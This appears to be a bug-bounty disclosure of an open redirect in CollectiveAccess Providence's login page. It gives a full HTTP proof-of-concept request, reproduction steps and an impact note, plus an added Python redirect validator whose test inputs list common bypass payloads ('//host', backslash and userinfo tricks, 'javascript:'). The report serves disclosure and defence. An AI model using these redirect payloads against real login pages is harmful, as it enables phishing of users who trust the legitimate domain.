Open Redirect in collectiveaccess/providence

Valid

Reported on

Sep 24th 2021


Description

Open Redirect on the login page via the redirect parameter (?redirect= in the URL, submitted as the form field "redirect"): the value is not validated, so a successful login sends the browser to an arbitrary absolute URL such as https://google.com.

Proof of Concept

// PoC.request
POST /system/Auth/DoLogin HTTP/1.1
Host: demo.collectiveaccess.org
Cookie: ca_demo=ea7632ab-0ad8-4b0f-939f-9e292f232ff6; CA_ca_demo_ui_locale=en_US
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------7051516316117565382118999645
Content-Length: 956
Origin: https://demo.collectiveaccess.org
Referer: https://demo.collectiveaccess.org/index.php/system/auth/login?redirect=https%3A%2F%2Fgoogle.com
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------7051516316117565382118999645
Content-Disposition: form-data; name="_formName"

login
-----------------------------7051516316117565382118999645
Content-Disposition: form-data; name="form_timestamp"

1632497569
-----------------------------7051516316117565382118999645
Content-Disposition: form-data; name="crsfToken"

c743d449b4dc4db0b508f04a51ab51f3a4c3de54f8d4e0fe262faf66308f3d3e
-----------------------------7051516316117565382118999645
Content-Disposition: form-data; name="username"

demo
-----------------------------7051516316117565382118999645
Content-Disposition: form-data; name="password"

demo
-----------------------------7051516316117565382118999645
Content-Disposition: form-data; name="redirect"

https://google.com
-----------------------------7051516316117565382118999645
Content-Disposition: form-data; name="local"

0
-----------------------------7051516316117565382118999645--

Steps to Reproduce

Open the demo site at https://demo.collectiveaccess.org/index.php/system/auth/login?redirect=https%3A%2F%2Fgoogle.com

Log in with valid credentials (demo / demo on the demo site). After a successful login the application redirects the browser to google.com instead of a page within the application.

Impact

The redirect target is not restricted to relative URLs within the application, so an attacker can craft a login link on the legitimate domain that, after the user authenticates, lands them on an attacker-controlled site. Because the user started on the real login page, they are likely to trust the destination (for example a lookalike page asking them to log in again).
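The server-side check that closes this class of bug, as an added example written for this page in Python; it is not the project's PHP code or its actual fix. The allowed host is taken from the demo site in the PoC, but the allowlist itself and the default landing page are assumptions. The check also covers the bypasses a naive "must start with /" rule misses: scheme-relative //host, backslash and triple-slash variants that browsers normalise to //host, userinfo tricks (trusted-host@evil), and non-https schemes.

```python
from urllib.parse import urlsplit

# Assumed allowlist of hosts the application may send users to after login.
# The host comes from the advisory's demo site; the allowlist itself is an assumption.
ALLOWED_HOSTS = {"demo.collectiveaccess.org"}

# Assumed fallback landing page used when the supplied redirect is rejected.
DEFAULT_AFTER_LOGIN = "/index.php"


def is_safe_redirect(target: str, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """Return True only if `target` keeps the user on this application.

    Accepts:
      - a path-relative URL with exactly one leading "/" (e.g. "/index.php/editor")
      - an absolute https:// URL whose host is in `allowed_hosts`
    Rejects everything else: other hosts, "//evil", "/\\evil", "///evil",
    "https://trusted@evil/", "javascript:" and strings with control characters.
    """
    if not target:
        return False
    # Browsers treat "\" like "/" when parsing the authority, so "/\evil.example"
    # is really "//evil.example". Normalise before looking at the string.
    normalised = target.replace("\\", "/")
    # Whitespace and control characters are used to smuggle a scheme or host past
    # prefix checks; reject them outright rather than trying to strip them.
    if any(ord(c) < 0x21 for c in normalised):
        return False
    parts = urlsplit(normalised)
    if parts.scheme == "" and parts.netloc == "":
        # Purely relative. Require a single leading "/": "//host" and "///host"
        # both resolve to an external host in browsers (WHATWG URL parsing).
        return normalised.startswith("/") and not normalised.startswith("//")
    if parts.scheme.lower() != "https":
        return False
    # urlsplit().hostname strips userinfo and port, so "trusted@evil" yields "evil".
    host = (parts.hostname or "").lower()
    return host in allowed_hosts


def redirect_after_login(requested: str) -> str:
    """Choose the post-login Location: the requested target if safe, else the default."""
    return requested if is_safe_redirect(requested) else DEFAULT_AFTER_LOGIN


if __name__ == "__main__":
    # Constructed sample inputs: the PoC value from this report plus common bypasses.
    for candidate in [
        "https://google.com",                       # the PoC payload
        "//google.com",
        "/\\google.com",
        "///google.com",
        "javascript:alert(1)",
        "https://demo.collectiveaccess.org@google.com/",
        "https://demo.collectiveaccess.org.google.com/",
        "/index.php/editor/objects",
        "https://demo.collectiveaccess.org/index.php",
    ]:
        print(f"{candidate!r:55} -> {redirect_after_login(candidate)}")
```

Note that a bare "index.php" (no leading slash) is also rejected; the login handler should build in-app targets as absolute paths so the strict rule costs nothing. If the application only ever needs in-app redirects, drop the https allowlist branch entirely and accept single-slash paths alone.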

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago
CollectiveAccess confirmed that a fix has been merged on 8034eb 2 months ago
CollectiveAccess has been awarded the fix bounty